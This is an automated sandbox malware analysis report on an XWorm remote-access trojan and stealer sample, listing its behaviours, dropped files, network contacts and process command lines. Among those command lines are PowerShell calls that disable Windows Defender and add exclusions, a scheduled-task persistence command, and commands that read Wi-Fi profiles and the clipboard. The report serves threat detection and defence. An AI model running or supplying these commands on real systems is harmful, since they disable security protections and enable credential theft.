Malware Analysis Report

2024-11-16 13:37

Sample ID 240429-qkd9zsbg9t
Target Output.exe
SHA256 e64455f4b8e898c1ebaf666344c0608bb344ca101126f543484ce2fc93cdc181
Tags
xworm persistence pyinstaller rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e64455f4b8e898c1ebaf666344c0608bb344ca101126f543484ce2fc93cdc181

Threat Level: Known bad

The file Output.exe was found to be: Known bad.

Malicious Activity Summary

xworm persistence pyinstaller rat spyware stealer trojan upx

Detect Xworm Payload

Xworm

Executes dropped EXE

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-29 13:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-29 13:18

Reported

2024-04-29 13:20

Platform

win10v2004-20240226-en

Max time kernel

39s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Output.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundPad.exe C:\Users\Admin\SoundPad.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk C:\Users\Admin\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gorillatag client = "C:\\Users\\Admin\\Gorillatag client.exe" C:\Users\Admin\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Users\Admin\SoundPad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\SoundPad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\XClient.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 2240 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\SoundPad.exe
PID 2240 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 2240 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\Output.exe C:\Users\Admin\XClient.exe
PID 3504 wrote to memory of 4544 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 3504 wrote to memory of 4544 N/A C:\Users\Admin\SoundPad.exe C:\Users\Admin\SoundPad.exe
PID 4992 wrote to memory of 3844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 3844 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 2136 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2136 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2136 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2136 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4544 wrote to memory of 4584 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4584 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 4480 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 4480 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 2524 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2524 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2524 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 1488 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 1488 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 3412 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe
PID 4992 wrote to memory of 3412 N/A C:\Users\Admin\XClient.exe C:\Windows\System32\schtasks.exe
PID 4544 wrote to memory of 2360 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2360 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2360 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4544 wrote to memory of 748 N/A C:\Users\Admin\SoundPad.exe C:\Windows\System32\Wbem\wmic.exe
PID 4544 wrote to memory of 748 N/A C:\Users\Admin\SoundPad.exe C:\Windows\System32\Wbem\wmic.exe
PID 4544 wrote to memory of 2440 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2440 N/A C:\Users\Admin\SoundPad.exe C:\Windows\system32\cmd.exe
PID 2440 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2440 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Users\Admin\XClient.exe

"C:\Users\Admin\XClient.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Gorillatag client.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Gorillatag client" /tr "C:\Users\Admin\Gorillatag client.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 149.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
GB 23.44.234.16:80 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 19.ip.gl.ply.gg udp
US 147.185.221.19:38173 19.ip.gl.ply.gg tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/2240-0-0x0000000000E10000-0x0000000001E12000-memory.dmp

memory/2240-1-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

C:\Users\Admin\SoundPad.exe

MD5 3b184b0bf9cae37d5a3f0025c43791f9
SHA1 4d384b79ec9bbef8cbc3ad85ee49914dca03888c
SHA256 b13f82bc8c09dd45d7cc4026ff2b9bb16ec302eef90bdb22e66bd8c9287b695f
SHA512 5d5e7030f49dff50933c1438f38c7dbdfd1e95b0e8155b4f16b2f6a205c6feff440c92588f0440ed543577dc2f25eabacd39730937a83615e01b5e798a19d51c

C:\Users\Admin\XClient.exe

MD5 b8a5902712f0159c808d05982f3f099f
SHA1 b5bc99d9f751a6d8618453761f6f1db7eb4ead59
SHA256 0325350841de44656ec17462500221ce09a1fd617cb56d1770a1ca6490b03713
SHA512 2b832adeadd64f094e7b83a29309636d4f2e8e2f8bdc9c798591d0f03874e7b02a0d26e940f8ceb709517be4d9ae771f12a7bab89b9c86f14d0229a7128a3d4d

memory/2240-97-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4992-96-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4992-114-0x0000000000120000-0x0000000000136000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI35042\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
